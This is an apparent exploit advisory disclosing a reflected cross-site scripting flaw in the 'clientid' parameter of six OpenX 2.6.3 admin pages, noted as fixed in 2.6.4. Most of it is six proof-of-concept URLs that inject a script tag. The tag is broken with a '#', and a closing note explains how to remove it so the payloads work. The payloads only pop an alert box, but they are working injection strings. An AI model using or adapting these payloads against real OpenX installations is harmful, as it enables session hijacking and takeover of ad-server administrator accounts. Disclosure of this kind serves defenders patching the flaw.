SecurityGyan

###############################################################################

OpenX 2.6.3 clientid parameter XSS Vulnerability

Input passed to the “clientid” parameter in “www/admin/banner-
acl.php”, “www/admin/banner-edit.php”, “www/admin/campaign-zone.php”,
“www/admin/advertiser-campaigns.php”, “www/admin/campaign-
banners.php”, and “www/admin/banner-activate.php” is not properly
sanitised before being returned to the user.

Vulnerability fixed in 2.6.4

http://www.openx.org/ad-server/download

parameter:clientid

published at: http://www.packetstormsecurity.org/0902-exploits/openxclient-xss.rar
###############################################################################

exploit1:
filename:www/admin/banner-acl.php

POC:

http://172.16.4.113/openx-2.6.3/www/admin/banner-acl.php?clientid=1′;<#script>alert(String.fromCharCode(88,83,83))&campaignid=1&bannerid=1

exploit2:
filename:www/admin/banner-edit.php

POC:

http://172.16.4.113/openx-2.6.3/www/admin/banner-edit.php?clientid=1';<#script>alert(String.fromCharCode(88,83,83))&campaignid=1&bannerid=1

exploit3:
filename:www/admin/campaign-zone.php

POC:

http://172.16.4.113/openx-2.6.3/www/admin/campaign-zone.php?clientid=1';<#script>alert(String.fromCharCode(88,83,83))&campaignid=1

exploit4:
filename:www/admin/advertiser-campaigns.php

POC:

http://172.16.4.113/openx-2.6.3/www/admin/advertiser-campaigns.php?clientid=1';<#script>alert(String.fromCharCode(88,83,83))

exploit5:
filename:www/admin/campaign-banners.php

POC:

http://172.16.4.113/openx-2.6.3/www/admin/campaign-banners.php?clientid=1';<#script>alert(String.fromCharCode(88,83,83))&campaignid=1

exploit6:
filename:www/admin/banner-activate.php

POC:

http://172.16.4.113/openx-2.6.3/www/admin/banner-activate.php?clientid=1';<#script>alert(String.fromCharCode(88,83,83))&campaignid=1&bannerid=1&value=0

Note:remove # character from starting script tag in all pocs to reproduce this vulnerability.
###############################################################################